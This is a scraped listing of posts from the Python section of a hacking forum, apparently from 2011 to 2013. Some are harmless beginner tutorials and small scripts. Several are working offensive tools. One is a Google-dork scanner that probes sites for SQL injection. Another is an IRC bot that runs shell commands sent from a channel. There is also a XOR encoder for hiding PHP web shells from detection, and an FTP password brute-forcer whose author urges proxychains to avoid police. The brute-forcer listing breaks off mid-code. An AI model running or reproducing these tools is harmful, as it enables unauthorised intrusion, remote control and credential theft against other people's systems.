Python - iExploit

Where to start in Python?

ninepandas — Thu, 21 Feb 2013 17:28:56 -0500

Hi there,

I am new to IExploit, and I was wondering if the community could help me out? I am currently learning C++ (I have been using it for the past 6-8 months), and I would like to start using python as my second codding language. I am curious as to where I should start, I have never used Python before, however I hope after learning it it could help me with writing exploits. What I want to start doing is learning how to write exploits, and how they work. In order for me to do that, I know I need to start off small and just learn Python. Where is a good place to start? I am excited about this forum and I hope the community will be a great fit to me. And I could bring something to this community too. Thank you in advance.

~Pandas

Dorker.py A SQL Injection Dork Scanner

Xin — Mon, 13 Jun 2011 21:29:08 -0400

I recently found that none of the dork scanners i used work anymore due to the change in google search.

This script useds a modified version of xgoogle so do not download the original and expect it to work.

Also it is not 100% perfect yet as google has a very good defence against automated dork scanning and picks it up after about the 5th or 6th page so im trying to find ways around it.

http://i.imgur.com/huRT3.png

http://i.imgur.com/huRT3.png

http://i.imgur.com/ROgGx.png

Source:

#!/usr/bin/python
## Dorker.py
## SQL Dork finder script that crawls google for sites vulnerable to SQL Injection
## Author: Xinapse
## Website: http://www.iexploit.org
## Email: iexploittube@gmail.com
## Twitter: #iExploitXinapse
## Version 0.0.1
## Usage dorker.py [options]
from xgoogle.search import GoogleSearch, SearchError
import time, urllib2, optparse

print '''
________                __                   
\______ \   ___________|  | __  ____ _______ 
 |    |  \ /  _ \_  __ \  |/ /_/ __ \\_  __ \
 |    `   (  <_> )  | \/    < \  ___/ |  | \/
/_______  /\____/|__|  |__|_ \ \___  >|__|   
        \/                  \/     \/        
---------------------------------------------------------------------------------
-- dorker.py                                                                   --
-- SQL Dork finder script                                                      --
-- Author: Xinapse                                                             --
-- Website: http://www.iexploit.org                                            --
-- Email: iexploittube@gmail.com                                               --
-- Twitter: #iExploitXinapse                                                   --
-- Version 0.0.1                                                               --
-- Usage dorker.py [options]                                                   --
---------------------------------------------------------------------------------
'''
parser = optparse.OptionParser()
options = optparse.OptionGroup(parser, 'Options')
parser.add_option('-d', '--dork', action='store', type='string', help='Dork to Scan', metavar='DORK')
parser.add_option('-f', '--file', action='store', type='string', help='Filename to save', metavar='FILE')
parser.add_option('-v', '--verbose', action=\"store_true\", dest=\"verbose\", default=False, help=\"Adds extra status messages showing program execution\")
parser.add_option('-e', '--evasion', action='store', type='string', help='How long to sleep between each google request, used to prevent google blocking your IP for too many requests, recommended at least 5+, default 10', metavar='EVASION')
(opts, args) = parser.parse_args()
urlno = 0
invuln = 0
if opts.dork:
    dork = opts.dork
else:
    print '>> Please enter a dork'
if opts.file:
    filename = opts.file
else:
    print '>> Please enter a filename'
if opts.verbose:
    verbose = 'true'
else:
    verbose = 'false'
if opts.evasion:
    evas = opts.evasion
else:
    evas = 10
pagecount = 0
counter = 0
try:
    pagecount = pagecount + 1
    if verbose == 'true':
        print '>> Crawling google page ' + str(pagecount) + '...'
    
    search = GoogleSearch(dork)
    
    
    
    
    while True:
        search.results_per_page=100
        tmp = search.get_results()
        
        if not tmp:
            break
            if verbose == 'true':
                print '>> No more results...'
        
                
        for t in tmp:
            try:
                
                url = t.url.encode(\"utf8\")
                if verbose == 'true':
                    print '>> Testing ' + url + ' for vulnerabilities...'
                testurl = url + \"'\"
                req = urllib2.urlopen(testurl)
                data = req.read()
                if \"sql\" in data or \"SQL\" in data or \"MySQL\" in data or \"MYSQL\" in data or \"MSSQL\" in data:
                    f = open (filename, \"a\")
                    if verbose == 'true':
                        print \">> Found possible injection in \" + url
                    f.write(testurl + \"\n\")
                    f.close()
                    counter = counter + 1
                else:
                    invuln = invuln + 1
            except:
                errors = 1
        if verbose == 'true':
            print '>> Sleeping to bypass google flood protection...'        
        time.sleep(evas)


except SearchError, e:
    print \">> Search failed: %s\" % e


print '>> Dorker scan ended'
print '>> ' + str(counter) + ' vulnerable sites found'
print '>> ' + str(invuln) + ' sites not vulnerable'
print '>> Thank you for using Dorker, output has been saved to ' + filename

Download entire archive with modded xgoogle

http://min.us/mZKiVMNMeJn0q#1f

python for hackers

jibudada — Fri, 25 May 2012 02:22:36 -0400

python is very powerful programming as well as scripting language. if you are interested in computer and network security then python is the best language for you.

i have found some video tutorial on "how to use python for information security"
www.securitytube.net/video/1933
www.securitytube.net/video/1946

Python for newcomers part 1

chroniccommand — Wed, 12 Jan 2011 06:30:43 -0500

Well welcome to my new series. Python for newcomers. Since I'm pretty much finished with my C for newcomers series, I've decided to write up a Python for newcomers series. Hopefully this will help many people with Python and help get started with it.

Part 1 - Getting started

Python is a now widely known language. I prefer it over many languages for its functionality and its power. With such a great community theres so many people willing to help you, and theres so many new modules being created each day. Hopefully this series will help you learn the joy of this programming language. Python is great for many things, but not the best when you need to interface with computer hardware and such because python is interpreted. This means it's slower than a compiled language such as C. Python is also a high level language, meaning it uses layers to communicate with the computers OS // Hardware.

Installing
Python can be almost any system. If you're running a *nix box, you can install it with your preferred package manager. Of course, you can download Python from http://python.org/

Once you've got it installed you should be all set up and ready to go.

Modes
There are two main ways to interact with python. One is Interactive mode and the other is IDLE. Interactive mode is like a command line. You type instructions one line at a time. IDLE includes Pythons interactive mode and much more. To run interactive mode, just type python at your command line. It should say something like this:


Python 2.6.5 (r265:79063, Apr 16 2010, 13:57:41) 
[GCC 4.4.3] on linux2
Type \"help\", \"copyright\", \"credits\" or \"license\" for more information.
>>>

This is interactive mode(Distinguished by the >>>). You can really do anything in interactive mode that you'd usually do in a python program. You can import, create functions, classes, etc. By default, interactive mode will print to the screen.

Hello world
Now it's about time to create our first ever program in python! This is easy. First open up interactive mode and get the prompt with the three >'s Then type the following:


print \"Hello, World!\"

And hit enter. You should get the output Hello, World. Then it will go back to the >>>.

Now how about values? If you're familiar with programming you should know what a value is. Take a look at the following code:


x = 2
print x

The first line assigns a value to x. This value is set as two. Then we print whatever the value of x is. We can change x to anything we want. A list, tuple, string, integer or whatever.

Manipulating strings
In Python we can assign strings to lets say, x. Then we can easily print it.


x = \"Hello\"
print x

Easy. You can add strings together too.


x = \"Hello \"
y = \"World\"
print x + y

You should get the output Hello World. You can add together strings, numbers, lists, tuples and tons of other things.

Python calculator
Python, like all other languages, is good for doing math. You can add, subtract, multiply, divide and much more. For more math options you can import the math module. I will not be going over the math module just yet. Here is a list of basic operators:
+ Addition x + y
- Subtraction x - y
* Multiplication x * y
/ Division x / y

Don't use an equals sign when preforming math. The equals sign is for assigning a name to a value. If you try to use it like so:

2 + 2 =

You will get a syntax error.

Imports
Importing modules is an important thing in Python. Importing modules provide extra code other than the defaults included such as print. To import a module, type Import followed by the module. Let's say I want to import the math module and print the value of pi.


import math
x = math.pi()
print x

This will print the value of pi. You can import several modules in one python code, such as sys, os, math and more.

Comments
Comments are very important in Python(Or in any other programming languages). Comments can help increase readability of code. If others are reading your code, they can read your comments to see what is going on in the code. You can also include comments to help you remember what you were doing or what you need to do in the code.
To create a comment, just add a #(pound) symbol. Anything following a pound will not be included in the code.


print \"Hi\" #Prints Hi to the screen

Note: Do not add comments to everything. That's just retarded. Add comments to things that need them.

Getting Help
Python includes a built in help function. This is very useful when you can't remember how to use a specific function or what. To use this help function, open the interactive mode and type help(). You should get this prompt:

help>

From here you can type a module, keyword or topic and get help about it. You can also type help(module) to get help about a specific module.

I hope you liked this very simple introduction to Python. Stay tuned for part 2, where I will discuss basic use of Strings, Integers and lists.

--Chroniccommand

Proxyworker a mass proxy grabber, scan, test tool

LeXeL — Mon, 22 Aug 2011 16:37:05 -0400

______                     _    _            _             
| ___ \                   | |  | |          | |            
| |_/ /_ __ _____  ___   _| |  | | ___  _ __| | _____ _ __ 
|  __/| '__/ _ \ \/ / | | | |/\| |/ _ \| '__| |/ / _ \ '__|
| |   | | | (_) >  <| |_| \  /\  / (_) | |  |   <  __/ |   
\_|   |_|  \___/_/\_\__,  |\/  \/ \___/|_|  |_|\_\___|_|   
                      _ / |                                
                     |___/

INFO:
Proxyworker is a python tool that grabs proxies from online sources and append them to a list. The list will be passed through several test's such as:
-Latency test: test the proxy speed according sending 1 package from your computer to the proxy.
-Speed test: if the proxy passes the latency test it connects to "http://google.com" and calculate the data+amount of time it takes to successfully get data.
-Anonymity test: Some proxy's show your real ip-address on the headers. The tool will print out if the proxy is anonymous or not.

*You might ask why print if the proxy is anonymous well mainly because you can use it for other propose that don't include HTTP headers.
Once you have a complete list working+tested proxy's you can bind them to your localhost(127.0.0.1) and surf the web using the proxy you just found.
* This tool is recommended to be used without any other application running for more efficiency, because it makes lot of connections via web servers and if you are using your browser it will take more time to scan for possible proxy's, also if you are f.ex watching youtube you can get low latency and will not get any result on the proxy's so please keep that in mind.

SCREENSHOT'S:
Helpscreen: Imageshack - helpscreen.jpg
Normal mode: Imageshack - normalim.jpg
Fullmode: Imageshack - fullmode.jpg
Individual proxy speed scan: Imageshack - testspeed.jpg
Individual proxy ping scan: Imageshack - pingfkn.jpg

HOW TO:
======================================Âº======================================Âº
Download Proxyworker.zip


LeXeL@Ubuntulab:~$ wget http://107.20.187.10:8000/Proxyworker.tar.gz
--2011-09-09 22:06:52--  http://107.20.187.10:8000/Proxyworker.tar.gz
Connecting to 107.20.187.10:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9410 (9.2K) [application/octet-stream]
Saving to: `Proxyworker.tar.gz'

100%[============================================>] 9,410       --.-K/s   in 0s

2011-09-09 22:06:52 (473 MB/s) - `Proxyworker.tar.gz' saved [9410/9410]

======================================Âº======================================Âº

UNZIP the proxyworker.zip


LeXeL@Ubuntulab:~$ tar -zxvf Proxyworker.tar.gz
Proxyworker.py
localhostconector.py
progressbar.py
tools/
tools/Scrapper.py

======================================Âº======================================Âº

HELPSCREEN:


LeXeL@Ubuntulab:~$ python Proxyworker.py -h
______                     _    _            _             
| ___ \                   | |  | |          | |            
| |_/ /_ __ _____  ___   _| |  | | ___  _ __| | _____ _ __ 
|  __/| '__/ _ \ \/ / | | | |/\| |/ _ \| '__| |/ / _ \ '__|
| |   | | | (_) >  <| |_| \  /\  / (_) | |  |   <  __/ |   
\_|   |_|  \___/_/\_\__,  |\/  \/ \___/|_|  |_|\_\___|_|   
                      _ / |                                
                     |___/    version 0.9.8
                     
                     
Proxyworker.py 


Currently supported commands:
 -s | Saves the proxies into a txt file
 -Sa| Set the name of the txt file
 -h | Print this help screen
 -f | Makes a full scan of the proxy:speed,anonymity and latency

----------------------------------------------------------------

Individual Commands:
-test | Test the giving proxy for speed, latency and anonymity
-ping | Get the latency of the giving proxy
-bind | Binds the proxy to the localhost
PRESS ENTER TO EXIT

======================================Âº======================================Âº

Complete scan:


LeXeL@Ubuntulab:~$ python Proxyworker.py -f
______                     _    _            _             
| ___ \                   | |  | |          | |            
| |_/ /_ __ _____  ___   _| |  | | ___  _ __| | _____ _ __ 
|  __/| '__/ _ \ \/ / | | | |/\| |/ _ \| '__| |/ / _ \ '__|
| |   | | | (_) >  <| |_| \  /\  / (_) | |  |   <  __/ |   
\_|   |_|  \___/_/\_\__,  |\/  \/ \___/|_|  |_|\_\___|_|   
                      _ / |                                
                     |___/    version 0.9.8
                     
                     
Save MODE: 0FF
[!]The Testmode is 0N
This will make the process take more time


Scaning for proxy's online please wait
100% |#########################################################################|
Found a total of: 600 Proxys
Proxy: 75.65.216.39:8080 
       +----- Latency        : 104 [Good]
[!]Problem getting the Transfer speed
Proxy: 68.39.161.178:8080 
       +----- Latency        : 104 [Good]
[!]Problem getting the Transfer speed
Proxy: 69.163.96.2:8080 
       +----- Latency        : 124 [Good]
[!]Problem getting the Transfer speed
Proxy: 209.97.203.60:8080 
       +----- Latency        : 151 [Good]
       +----- Transfer speed : 3.29kB/s
       +----- Anonymous proxy: NO
Proxy: 69.163.96.3:8080 
       +----- Latency        : 130 [Good]
       +----- Transfer speed : 0.08kB/s
       +----- Anonymous proxy: YES

======================================Âº======================================Âº

Bind a proxy:


LeXeL@Ubuntulab:~$ python Proxyworker.py -bind

======================================Âº======================================Âº

FAQ:
1. Why this tool?
R: This tool comes from a long story since MPG(a group of http://forum.intern0t.net decided to code a tool that grabs proxy's) after that the proyect die, but i grab again the idea and add
some other stuffs

======================================Âº======================================Âº

Credits:
This tool was created.tested.developed by LeXeL(lexelEZ@gmail.com)
There is some collaboration by Aceldama, irenicus09
Special thanks to: Eph, s3my0n, DiabloHorn, g0tm1lk, and all intern0t members.

======================================Âº======================================Âº

EDITS:
0.9.8 - added Saves file by default (ProxyworkerLogs.txt)
- Fixed some bugs
- Improve the Anonymous Scan
- Add a directory with tools that have to do with Proxyworker
** Changed the host!

arithmetic / geometric series

undead — Sat, 03 Mar 2012 09:28:19 -0500

This little program can find the sum of n terms of an arithmetic progression as well as of a geometric progression.

If you don't know what arithmetic and geometric progressions are visit these links:

http://en.wikipedia.org/wiki/Geometric_progression
http://en.wikipedia.org/wiki/Arithmetic_progression

#!/usr/bin/python

#a1: initial term of the arithmetic/geometric progression
#dif: common difference
#n: number of terms
#crat: common ratio

class ArithmeticProgression:
	def __init__(self, a1, n, dif):
		self.a1 = a1
		self.n = n
		self.dif = dif
	def PrintSum(self):
		S = (self.n/2)*(2*self.a1 + (self.n-1)*self.dif)
                # S = n/2 ( 2a1 + (n-1)dif )  or S = n/2 (a1 + an)
		print S

class GeometricProgression:
	def __init__(self, a1, n, crat):
		self.a1 = a1
		self.n = n
		self.crat = crat
	def PrintSum(self):
		S = self.a1 * ( (self.crat**self.n - 1) / (self.crat - 1) )
                # S = a1 * commonratio**n - 1 / commonratio - 1, commonratio != 1
		print S		
		

#first argument: initial term
#sencond argument: number of terms
#third argument: common difference for the arithmetic progression and common ratio for geometric progression

sum1 = ArithmeticProgression(1, 100, 1) #1+2+3+...+100
sum1.PrintSum()
sum2 = GeometricProgression(1, 7, 3) #1+3+9+27+81+243+729
sum2.PrintSum()

enjoy :)

Sockets(in Python)

chroniccommand — Sat, 05 Mar 2011 20:08:46 -0500

[-----------------------]
Paper: Sockets(in Python)
Author: Chroniccommand
[-----------------------]
Contents:
1 - Intro
2 - Network overview
3 - TCP in python
4 - Using sockets

[--Intro--]
This is a paper I've decided to write for those who don't know much about sockets. I will be going over what is a socket, what types of sockets are there, etc. I will also be using Python for the main language here.

[--Network overview--]
So what exactly is a network? Well to put it in a bit easier to understand terms, a network is a connection from one machine to another(and to another and another....). The Internet, is a series of tubes(loljk). The Internet consists of millions of networks connected. Machines in a LAN network talk to each other using a MAC address(A 48-bit serial number), that the computer has assigned to it. I will be using the examples computer A, computer B and computer C. Computers A and B are on the same network. Computer C is a computer in lets say, Taiwan. All computers on the Internet are assigned an IP(Internet Protocol) address. If machine A wants to communicate with machine C in Taiwan, machine A sends to the router first. Then that router sends to another one, to another one, to another one until it reaches computer C's network. The router puts C's MAC address in the packet and sends it out on the local Network. Computer C will see that packet with it's MAC address in it and accept it. Now to explain ports. A port can be a physical port on the computer(Like a USB port). But we're talking about network ports. Ports are essentially processes on a machine that handle connections to that network. Lower ports are usually reserved for more known ports, such as:
21 [align=center]FTP[/align]
22 [align=center]SSH[/align]
23 [align=center]Telnet[/align]
80 [align=center]HTTP[/align]
110 [align=center]POP3[/align]

And there's of course a lot more "famous" ports.

[--What is a socket--]
Well what exactly is a socket you ask? Well simply, a socket allows for easy communication over a network. Originally developed by Berkely as a UNIX only feature, sockets are widely used in almost everything now. Think of a socket as a phone call. You dial a number(host), with an extension(port). Then you can use that connection between "phones" to talk to each other and communicate.

[--TCP(in Python)--]
So what is TCP? Well it stands for Transmission Control Protocol. TCP is one of the core components of the Internet Protocol Suite. The other is UDP. TCP is more reliable than UDP, but UDP is still used in some cases(I'll get to that later). So TCP is usually used. What happens with TCP is that a message from machine A is first broken into pieces and sent separately. At machine C, the TCP layer of the network will check the pieces for errors, re-assemble the pieces and then deliver the message to C. Everything that is sent from A to C is considered one big message. This can make things a bit complicated on the receiving side. This is why it's useful to just have a while loop until it receives a message saying C has finished receiving the message. Now lets see a simple server in python.
----server.py----


#!/usr/bin/python
import socket, sys
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #Create an TCP socket
#Associate socket with port
host = ''
port = int(sys.argv[1])
s.bind((host,port))

s.listen(1) #Listen for one connection(From the client)
conn, addr = s.accept()
print 'Client is ', addr

data = conn.recv(1024)
data = 10000 * data
conn.send(data)
conn.close()

------------
Fairly simple. Create socket, associate host and port to socket, listen for client, accept connection from client, receive up to 1024 bytes of data from client. Then we close the socket. Now for the client.
----client.py----


#!/usr/bin/python
import sys, socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = sys.argv[1]
port = int(sys.argv[2])
s.connect((host, port))
s.send(sys.argv[3])

#Now the while loop
i = 0
while(1):
    data = s.recv(1024)
    i += 1
    if (i < 5):
        print data
    if not data:
        break
s.close()

----------
Also simple. Create TCP socket, connect to host and port, send a string. Loop to receive data from the server until data is 5(looking at the first part of the message). So you'd run the server on one machine:
python server.py 4073

Then the client on another:
python client.py ip_of_server 4073 hello

This sends the string "hello" to the server who is accepting connections on port 4073.

Now of course, the message is regarded by the OS as splits of a message which gets re-assembled into one big message.

[--Using sockets--]
Python is wonderful for using socket's. It's much easier than socket programming in C. If you take a look at the server and client python files you should see the basic syntax of using sockets. To create a socket, you would do this:


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

This is creating a TCP socket and setting it as s. If you want a UDP socket, you change SOCK_STREAM to SOCK_DGRAM. For the server, we see we run the code s.bind(). This binds the host and the port to the server. The listen() function listens for clients. For the server, it listens for just 1 connection. We can change that number to accept more clients at one time. Coding socket in python is pretty easy. To learn more, visit the documentation page at http://docs.python.org/library/socket.html

[--UDP sockets(in Python)--]
UDP stands for User Datagram Protocol. UDP is less popular but is still used. UDP sends data in one connection, allowing room for more errors. Basically theres a chance that the message will end up scrambled or not even make it to the destination at all. This is why TCP is more widely used as it is more reliable. To create a UDP socket in python, you'd use the following syntax:


s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM

The one major change we see from using TCP sockets is SOCK_DGRAM. This simply declares the socket as a UDP, or datagram socket.

[--UNIX sockets--]
Now I just wanted to go over this briefly in this paper. A UNIX socket is a special type of socket. Obviously, it's only available in a UNIX system, so it wont work on Windows. But a UNIX socket is a type of socket that allows for inter process communication on a UNIX type system. You can declare a UNIX socket using:


s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)

This will create a UNIX TCP socket. Fairly simple.

[--IPv6 sockets--]
Another useful thing you can do with sockets is create an IPv6 socket. IPv6 is more advanced than IPv4, and allows for a lot more possible addresses. Note that soon enough, IPv6 will be used over IPv4. To declare an IPv6 socket in Python, you'd do something like this:


s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM_

The big difference here is the AF_INET6. This will create an INET6 socket instead of INET, which is IPv4.

--EOF

Fibonacci Sequence

Xpectz — Mon, 05 Sep 2011 00:59:44 -0400

This program ask the user to insert the quantity of numbers from the fibonacci sequence are going to print. And as an add-on the program ask you if you wanna insert another number.


def sequence (i):
    n = 1
    a = 0
    b = 1
    c = 0
    while n<=i:
        if n==1:
            print \"0\",
            n = n + 1
        elif n==2:
            print \"1\",
            n = n + 1
        else:
            c = a + b
            a = b
            b = c
            print c,
            n = n + 1
            continue
r = str(\"Y\")
while (r == \"y\")or(r==\"Y\"):
    i = input(\"Insert the quantity of numbers that you like to print    \")
    sequence(i)
    print \"\"
    r = raw_input(\"You wanna insert another number Y/N   \")

Rainbow Tables Generator

linc0ln.dll — Sat, 27 Aug 2011 14:27:42 -0400

http://pastie.org/2438398

positioning pointer file

schumbag — Sun, 14 Aug 2011 22:29:24 -0400

This example illustrates the program to read from a file format id3 mp3.
for ID3v1, will be stored at 128 the last byte, where if the file has a tag (id3), then TAG.for there will be writing the file to have this tag, we will process it, it's just should be in a position to move the file pointer to the last 128 bytes.


#!/usr/bin/python
#coder : cakill schumbag
#program ilustrasikan mp3 reader
#untuk file yang memiliki TAG akan di proses
#tapi sebelumnya harus di pindah ke posisi pointer 128 byte terakhir
import sys
def main():
    if len(sys.argv) < 2 :
        sys.exit('gk terjadi apa-apa tuh')
    else:
      try:
        a = open(sys.argv[1])
        a.seek(-128,2)
        info = ()
        if a.read(3) == 'TAG':
          info['title'] = a.read(30) .strip()
          info['artist'] = a.read(30) .strip()
          info['album'] = a.read(30) .strip()
          info['year'] = a.read(4) .strip()
          info['comment'] = a.read(30) .strip()
          a.close()
          for i in info.keys():
            print'%s = %s' %(i,info[i])
            else:
           a.close()
           sys.exit('file nya gak pake tag')
    
          except IOError, msg:
         sys.exit(msg)
if __name__ == '__main__':
    main()

Explanation :


a = open(sys.argv[1])
a.seek(-128,2)
info = ()
if a.read(3) == 'TAG':
info['title'] = a.read(30) .strip()
info['artist'] = a.read(30) .strip()
info['album'] = a.read(30) .strip()
info['year'] = a.read(4) .strip()
info['comment'] = a.read(30) .strip()

after we move the file pointer position and know that the file
have a tag, we can get the title, artist, album, year and comment reply one by one have a data width 30byte, 30byte, 30byte, 4byte, and 30byte sequentially relative to one another.
This script put it all into one dir.
http://lppt.ugm.ac.id/py.png

and this. . .


for i in info.keys():
print'%s = %s' %(i,info[i])

will print the info that we can

regards,and say hi from indonesian :)

SHBot

s1n4 — Mon, 08 Aug 2011 17:52:45 -0400

Hi guys,

SHBot is the name of an irc bot.
You can run shell commands from IRC channel with the following code.

#!/usr/bin/python

import os, random, socket, sys

def usage() :
	print 'Usage: %s [Server address] [#Channel]' % sys.argv[0]
	exit()

def ForK() :
	pid = os.fork()
	if pid != 0 :
		exit()

def main() :
    num = ''
    for i in range(0, 3) :
        rand = random.randint(0, 10)
        num += str(rand)

    NICK = 'SH[' + num + ']'
    USER = 's1n4zbot'
    SERV = sys.argv[1]
    CHAN = sys.argv[2]
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try :
        sock.connect((SERV, 6667))

    except :
        exit()

    sock.send('NICK %s\r\n' % NICK)
    sock.send('USER %s %s %s :Bot\r\n' % (USER, USER, SERV))

    while True :
        data = sock.recv(1024)

        if 'End of /MOTD command.' in data :
            sock.send('JOIN %s\r\n' % CHAN)
            break

    while True :
        data = sock.recv(1024)
        args = data.replace(':', '').split()

        if len(args) >= 1 and args[0] == 'PING' :
            sock.send('PONG %s\r\n' % data.split()[1])
            continue

        if len(args) >= 3 and args[1] == 'KICK' and args[3] == NICK :
            sock.send('JOIN %s\r\n' % CHAN)
            continue

        if len(args) >= 5 and args[3] == '!do' :
            command = data[data.find('!do')+4:-2]
            results = os.popen(command).read().splitlines()
            for result in results :
                sock.send('PRIVMSG %s :%s\r\n' % (CHAN, result))
            continue

        if len(args) >= 4 and args[3] == '!quit' :
            QMSG = data[data.find('!quit')+6:-2]
            sock.send('QUIT :%s\r\n' % QMSG)
            exit()


if len(sys.argv) == 3 :
	ForK()
	main()

else :
	usage()

http://s1n4.files.wordpress.com/2011/07/shbot.png?

http://s1n4.wordpress.com/2011/07/18/shbot/

PSU

s1n4 — Mon, 08 Aug 2011 18:01:32 -0400

What is PSU ?
PSU is a xor encoder for php shells (â€œphp shell undetectorâ€, indeed a tool for hackers)
You can xor your php code with the following code.

#!/usr/bin/python

import sys

def usage() :
	print 'Usage : %s [file] [key]' % sys.argv[0]
	exit()

def main(fn, key) :
	try :
		Input = file(fn, 'r').read()

	except :
		usage()

	enc = ''
	res = ''
	c = 0

	if Input.find('<?php') != -1 :
		Input = Input.replace('<?php', '')

	elif Input.find('<?') != -1 :
		Input = Input.replace('<?', '')

	elif Input.find('?>') != -1 :
		Input = Input.replace('?>', '')

	for i in Input :
		enc += chr(ord(i) ^ ord(key[c]))

		if c == len(key)-1 :
			c = 0
		continue
	c += 1

	for ii in enc :
		res += r'\x' + ii.encode('hex')

	x = fn[:-fn.find('.')-2]
	y = x + 'xored.'
	z = y + fn[fn.find('.')+1:]

	Output = file(z, 'w')
	Output.write('<?php\n')
	Output.write('$code = \"' + res + '\";\n')
	Output.write('$key = \"' + key + '\";\n')
	Output.write('''$mcode = \"\";
	$c2 = 0;

	for ($c=0; $c<=strlen($code)-1; $c++)
{
	$mcode .= chr(ord($code[$c]) ^ ord($key[$c2]));
	if ($c2 == strlen($key)-1)
	{
		$c2 = 0;
		continue;
	}
	$c2++;
}
eval($mcode);
?>''')
	Output.close()

if len(sys.argv) == 3 :
	main(sys.argv[1], sys.argv[2])
	print 'Done!'

else :
	usage()

http://s1n4.wordpress.com/2011/08/06/psu/

Python number guessing game

nu11byte — Thu, 21 Jul 2011 11:46:10 -0400

Well, I got bored and decided to brush up on some Python. It's been quite a while since I actually sat down and coded a program from scratch. This is very simple, yet I have tried to add some level of complexity to it. Feel free to post some changes and suggestions to this program (Yes, I know I didn't need to define some stuff, I just did to refresh my mind).

Edit: Source code posted on Pastebin as the forums code tags fubar'd my code and indentations.

http://pastebin.com/NgH5N63X

How to copy string to clipboard

s1n4 — Sun, 24 Jul 2011 20:25:05 -0400

You can copy string to clipboard with GUI toolkit but how, for example you can use Tkinter. (ah, I should say in python)

you can copy string to clipboard with the following code.
(It's just a sample)


#!/usr/bin/python

from Tkinter import Tk
x = Tk()
x.withdraw()
x.clipboard_clear()
i = raw_input(\">> \")
x.clipboard_append(i)
x.destroy()

print repr(i), \"Copied to clipboard\"
raw_input(\"Press enter to exit\")

xor encoder v2.0

s1n4 — Fri, 24 Jun 2011 09:51:41 -0400

Another version of xor encoder

#!/usr/bin/python

################################
#####                      #####
#####      Xor encoder     #####
#####   For encoding file  #####
#####                      #####
#####    Writen by s1n4    #####
#####    June 16 , 2011    #####
#####       3:55 AM        #####
#####                      #####
################################

import sys

def usage() :
    print 'Usage: %s [Key] [File]' % sys.argv[0]
    exit()

def xor(key, fn) :
    try :
        Input = open(fn, 'rb').read()

    except IOError :
        usage()

    res = ''
    c = 0

    for i in Input :
        res += chr(ord(i) ^ ord(key[c]))
        if c == len(key) - 1 :
            c = 0
            continue

        c += 1

    try :
        Output = open(fn, 'wb')
        Output.write(res)

    finally :
        Output.close()
        print key, 'xor', fn

def main() :
    if len(sys.argv) == 3 :
        xor(sys.argv[1], sys.argv[2])

    else :
        usage()

main()

For example :

xor.py s1n4 test.zip

For access to the original file you must xor again with latest key.

xor encoder v1.0

s1n4 — Thu, 23 Jun 2011 04:02:29 -0400

Hi everyone,

I wrote a simple xor encoder in python.

#!/usr/bin/python

#A simple xor encoder
#Xor the input file with 0-255
#Written by s1n4


import sys

def usage() :
	print 'Usage: %s [Key] [File]' % sys.argv[0]
	print '[Key] 0x00-0xff same as 0-255'
	exit()


def xor(key, fn) :
	try :
		Input = open(fn, 'rb').read()

	except IOError :
		usage()

	res = ''

	for i in Input :
		try :
			res += chr(ord(i) ^ eval(key))

		except :
			usage()


	try :
		Output = open(fn, 'wb')
		Output.write(res)

	finally :
		Output.close()
		print fn, 'xor', key


def main() :
	if len(sys.argv) == 3 :
		xor(sys.argv[1], sys.argv[2])

	else :
		usage()

main()

For example :

xor.py 0x4a test.txt

For access to the original file you must xor again with latest key.

FTPeeNuke

chroniccommand — Sun, 27 Feb 2011 00:59:38 -0500

FTPeeNuke version 1.0

FTPeeNuke is an FTP brute forcer written in Python by me(chroniccommand).

It uses ftplib to try and connect to the server over and over until it gets a password match or it reaches the end of the wordlist.

Tested on:
[list]
[*]T35 accounts[/*:m]
[*]Local proFTP server[/*:m][/list:u]

Source:


#!/usr/bin/python

'''
FTPeeNuke v1.0
Author: Chroniccommand
http://poison.teamxpc.com ; http://iExploit.org/ ; http://team-xpc.com/ ; http://haxme.org/
Blackhats ftw. Fuck whitehats.

Please note that this is best used with proxychains to protect your identity.
Would'nt wanna get fuxed up by the po po would ya?
'''

print('''
 _____ _____ _____         _____     _       
|   __|_   _|  _  |___ ___|   | |_ _| |_ ___ 
|   __| | | |   __| -_| -_| | | | | | '_| -_|
|__|    |_| |__|  |___|___|_|___|___|_,_|___|
Version 1.0
Author: Chroniccommand
http://poison.teamxpc.com/
NOTE: You may wanna use proxychains with this
''')

import sys, ftplib

def usage():
    '''
    Print usage
    '''
    print(\"Usage: %s <target> <username> <wordlist>\nExample: ./ftpeenuke.py 192.168.1.1 root /wordlist.txt\" % sys.argv[0])
    sys.exit()

if len(sys.argv) != 4:
    usage()

global host
host = str(sys.argv[1])
global user
user = str(sys.argv[2])
global wlist
wlist = str(sys.argv[3])

def isanon(hst):
    '''
    Check for anonymous login
    '''
    print \"Checking...\"
    try:
        conn = ftplib.FTP(hst)
        conn.login()
        conn.retrlines('LIST')
        conn.quit()
        print \"Anon login successful\"
        raw_input(\"Press enter to continue...\")
        print(\"Attacking %s\" % host)
        pass
    except Exception:
        print \"Anon login unsuccessful\"
        raw_input(\"Press enter to continue...\")
        print(\"Attacking %s\" % host)
        pass
    
def bruteme(word, usr):
    '''
    Attack
    '''
    try:
        conn = ftplib.FTP(host)
        conn.login(usr, word)
        conn.retrlines('LIST')
        conn.quit()
        print(\"Found password for user %s\" % usr)
        print(\"Password: \" + word)
        writefile = raw_input(\"Write to file?[Y/n]\")
        if writefile == \"Y\":
            file = open(\"ftpeenuke.txt\", 'a')
            file.write(\"-+-+-+-+-+-{FTPeeNuke dump}+-+-+-+-+-+\n\")
            file.write(\"Host: \" + sys.argv[1] + \"\n\")
            file.write(\"Username: \" + usr + \"\n\")
            file.write(\"Password: \" + word + \"\n\")
            file.write(\"-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n\")
            file.close()
            print(\"Dumped results to file\")
            raw_input(\"Press enter to continue\")
            sys.exit()
        else:
            raw_input(\"Press enter to continue\")
            sys.exit()
    except Exception:
        print(\"Trying password %s\" % word)
        pass
    except KeyboardInterrupt:
        print(\"FTPeeNuke aborted by user\n\")
        sys.exit(1)

try:
    wordfile = open(wlist, 'r')
    curwords = wordfile.readlines()
    current = 0
    while current < len(curwords):
        curwords[current] = curwords[current].strip()
        current = current + 1
except IOError:
